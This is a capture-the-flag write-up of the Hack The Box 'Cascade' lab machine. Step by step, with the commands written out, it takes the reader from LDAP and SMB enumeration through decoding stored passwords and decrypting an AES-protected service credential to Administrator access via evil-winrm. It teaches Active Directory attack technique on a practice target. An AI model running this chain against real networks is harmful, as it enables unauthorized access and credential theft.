[hackthebox]Cascade

Introduction

This is rated a medium difficulty machine, I encountered a lot of twists and turns, the items found do not give me direct answers, but are required to reveal the answers that is user.txt and root.txt. Very interesting machine which requires the knowledge of manual ldap enumeration with ldapsearch to gain initial foothold, then on the root requires me to decompile one executable and one library to get two clues for root.txt.

nmap enumeration

I did some of the htb machines and found that I had missed out some ports and hence causing my path to user and root arduous. So I used this command to ensure every port is checked nmap -A -p- -T4 -oN cascade -vvv -Pn 10.10.10.182

Collect user names

rpcclient -U "" -N 10.10.10.182 this works when anonymous connection with rpc is allowed. Then I did the enumdomusers

Another way is to use enum4linux -a 10.10.10.182 this collects almost all information about Windows.
enum4linux helped me collected a list of domain users, local users, domain groups, each domain groups have which members.

These are the users:

CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

Can I get anonymouse smb and get share information?

smbclient -L 10.10.10.182, from the output smbclient allows anonymous login but there are no shares.

Use nmap script to do ldap search

nmap -p 389 --script ldap-search 10.10.10.182 -vvv -Pn this command uses the ldap-search nse script to get the ldap information.

The nmap ldap search script output gives me a list of distinguished names but there are no information of common names of each users, but it gave me the domain DN dn: DC=cascade,DC=local which is the same as cascade.local.

Check for stupid password

I got a list of usernames, there could be a chance when the username and its password are the same. So I am using msfconsole to help me do smb_login checks.
In msfconsole use the auxiliary/scanner/smb/smb_login:

Unfortunately it is not so easy…, no user accounts use stupid password…

Manual ldap enumeration

I was stucked in getting a foothold as all tools have given me not too useful information to break through until I watched the video by ippsec explaining how he solves the Forest machine. ippsec explained on how to use ldapsearch to manually do the ldap enumeration.
So after some testing I concluded this command:
ldapsearch -x -b "DC=cascade,DC=local" '(objectClass=Person)' -h 10.10.10.182 | tee ldapsearch_users.txt
The output is very long, there is a password within the output, I read this 3 times to finally found that Ryan Thompson (sAMAccountName: r.thompson) has a special attribute:
cascadeLegacyPwd: clk0bjVldmE=
So I use base64 decode to get the plaintext:
echo "clk0bjVldmE=" | base64 -d

The plaintext password is rY4n5eva, notice from the nmap enumeration tcp/5985 which is winrm port is opened, so I use evil-winrm to see if I can login as r.thompson.
evil-winrm -i 10.10.10.182 -u r.thompson -p rY4n5eva, unfortunately connection was unsuccessful 😦

Connect to smb shares with r.thompson

I use smbmap -u r.thompson -p rY4n5eva -d cascade.local -H 10.10.10.182

I used smbclient //10.10.10.182/Data -U r.thompson to get into smb data share, I downloaded everything I can find to be analyze later.
So here are the locations:

Get the user flag

After I anaylzed the files downloaded from smb share, this file VNC Install.reg has the password of s.smith, the password is a vnc hex string:
, I manually removed all the commas so that it is a hex string like this 6bcf2a4b6e5aca0f to decode the hex string to plaintext I use vncpasswd.py script.
python ../tools/vncpasswd.py/vncpasswd.py -d -H "$(cat s.smith_vnc_pass)", the output looks like below:

I tried the password for s.smith and it worked.
evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2

I have decided to show the user flag because this flag is dynamic and will be randomized by HTB.

Search for clues towards root

The items downloaded from smb shares are useful now, here are the exhibits towards to the path of root.
Meeting_Notes_June_2018.html reveals that TempAdmin password is the same as Administrator, so by getting the TempAdmin password I can get the Administrator password.

On ArkAdRecycleBin.log it reveals that using ARK AD RECYCLE BIN MANAGER executed by arksvc removes TempAdmin account to AD recycle bin.

Using the account of r.thompson I searched through high and low for a binary, but those I found were rabbit holes, finally I remember something… maybe the binaries are in the smb shares…

Find the binaries and database

To find the binaries I used s.smith credential to find out what are the shares that this account can access, and I found that s.smith can access Audit$ and r.thompson cannot.
smbmap -u s.smith -p sT333ve2 -d cascade.local -H 10.10.10.182

To login to the Audit$ shares I use smbclient //10.10.10.182/Audit$ -U s.smith.
Ah… So I have found the binaries…
, the rest of the files I found except for CascAudit.exe , CascCrypto.dll, Audit.db are rabbit holes.

Audit.db is a sqlite database, so I digged further by connecting to this database.
Read this article to learn how to connect to sqlite db with sqlite3 client in linux. As I do not know the structure of the database I am using strings Audit.db to help me read human readable text within the database.

So ldap is the table I need to get some usernames and passwords.

I connect to Audit.db by sqlite3 Audit.db.

There is only one entry which should be the password of arksvc but it is not a plaintext password, at first I thought it was a base64 encoded text, unfortunately it was no so easy.

Find the Initializing Vector and Key from CascAudit.exe and CascCrypto.dll

Two members from the forum recommended dnSpy which is a .net decompiler to find the IV and key.
I quickly download and import a Win10 machine which is free for developers for 90 days for doing development work and testing, then I downloaded the dnSpy and installed the dependencies.

First I loaded the CascCrypto.dll and found the IV.

The IV is 1tdyjCbY1Ix49842.

Next I open CascAudit.exe to find the key.

The key is c4scadek3y654321.

The last thing I need is a ciphertext of Administrator to reveal the password.

Get ArkSvc password

I got the Arksvc’s ciphertext password from Audit.db using sqlite3 client, this is the ciphertext BQO5l5Kj9MdErXx6Q6AGOw==, from the dnSpy it is revealed that the binaries use AES CBC encryption which is 128-bit.

With the ciphertext, IV and key I can decrypt with AES-CBC 128-bit, I am using this online decrypter to help me recover the plaintext password of arksvc.

arksvc password is w3lc0meFr31nd.

Get the root

evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd
arksvc is a member of AD recycle bin which s.smith is not, in order to read the deleted AD object member of AD recycle bin is necessary, arksvc cannot restore the AD but it can read the deleted object within the AD recycle bin.

I need to read the TempAdmin to see if the password is inside, I searched the web and found this forum which explained how to read the deleted AD object.
In evil-winrm this is the command I use to read the deleted TempAdmin Get-ADObject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -Filter {ObjectClass -eq "user"} -Properties * -IncludeDeletedObjects
Read the result line by line I found there is a password:
.

the base64 encoded password is YmFDVDNyMWFOMDBkbGVz.
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d reveals the TempAdmin plaintext password, which is the same password of Administrator as learned from the email downloaded from the smb share.

the password is baCT3r1aN00dles

I login with evil-winrm as Administrator: evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles